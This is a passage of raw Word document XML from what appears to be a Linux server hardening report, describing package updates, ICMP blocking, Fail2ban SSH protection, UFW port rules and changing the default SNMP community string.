    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update the package lists from the repositories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade the installed packages to their latest versions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove unnecessary packages that are no longer needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_su0t4whb0jdh" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Block ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disabling ICMP may hide a system's presence, potentially enhancing security. However, it can hinder network monitoring and troubleshooting. Balancing these considerations is essential. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable ICMP responses in the system configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4114800" cy="701386"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="27273" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="701386"/>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before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3657600" cy="749362"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="10158"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="749362"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yvsu3mv8fw8j" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8m4d41s7p86h" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fail2ban is an automated security tool that takes action by blocking an IP address if it detects repeated attempts to brute force the SSH service, enhancing the system's security. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_29qtsyjaai27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">4.4. - Fail2ban</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Installing Fail2Ban which will help our server detect any illegal activity automatically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the configuration file to set the services to protected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sets up a jail for the SSH service, with a maximum of 5 login attempts and 1 hour ban time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Renaming necessary commands to run the file and start the service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y3u7hk65irwt" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based Firewall (UFW)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By utilizing UFW (Uncomplicated Firewall), we've effectively restricted access to only the necessary ports for various services, thereby significantly reducing the machine's attack surface and enhancing its security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_umm4za9z4hn">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">4.5. - Host-Based Firewall (UFW)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allow specific incoming traffic on certain ports while blocking the rest (allow 22, 80, 443,139,445, UDP 161, block the rest of the ports)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable UFW to start enforcing the rules:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="521547"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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029200" cy="521547"/>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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rnlfk7jg5jre" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To prevent a simple brute-force attack from succeeding with the default read-only string of “public”, we have changed the string to contain uppercase and lowercase letters, as well as symbols as shown.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="865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55"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># rocommunity: a SNMPv1/SNMPv2c read-only access community name</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   arguments:  community [default|hostname|network/bits] [oid | -V view]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Read-only access to everyone to the systemonly view</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">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rocommunity  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
